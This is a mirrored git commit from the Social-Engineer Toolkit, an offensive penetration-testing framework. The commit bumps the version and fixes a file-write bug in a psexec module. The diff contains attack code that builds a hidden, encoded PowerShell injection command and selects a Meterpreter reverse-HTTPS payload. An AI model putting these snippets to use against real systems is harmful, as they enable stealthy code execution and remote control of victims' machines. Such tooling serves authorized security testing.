mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-02-17 05:48:46 +00:00
psexec fix
This commit is contained in:
parent
80fe5c0096
commit
59ad7dd8dc
3 changed files with 11 additions and 3 deletions
|
@ -1,3 +1,9 @@
|
|||
~~~~~~~~~~~~~~~~
|
||||
version 7.3.5
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
* fixed an issue that would cause psexec fasttrack to not properly work based on with open
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 7.3.4
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
|
|
@ -1 +1 @@
|
|||
7.3.4
|
||||
7.3.5
|
||||
|
|
|
@ -87,8 +87,10 @@ try:
|
|||
x86 = fileopen.read()
|
||||
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
|
||||
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
|
||||
with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
|
||||
filewrite.write(x86)
|
||||
filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||
#with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
|
||||
filewrite.write(x86)
|
||||
filewrite.close()
|
||||
payload = "windows/meterpreter/reverse_https\n" # if we are using x86
|
||||
command = x86 # assign powershell to command
|
||||
|
||||
|
|
Loading…
Add table
Reference in a new issue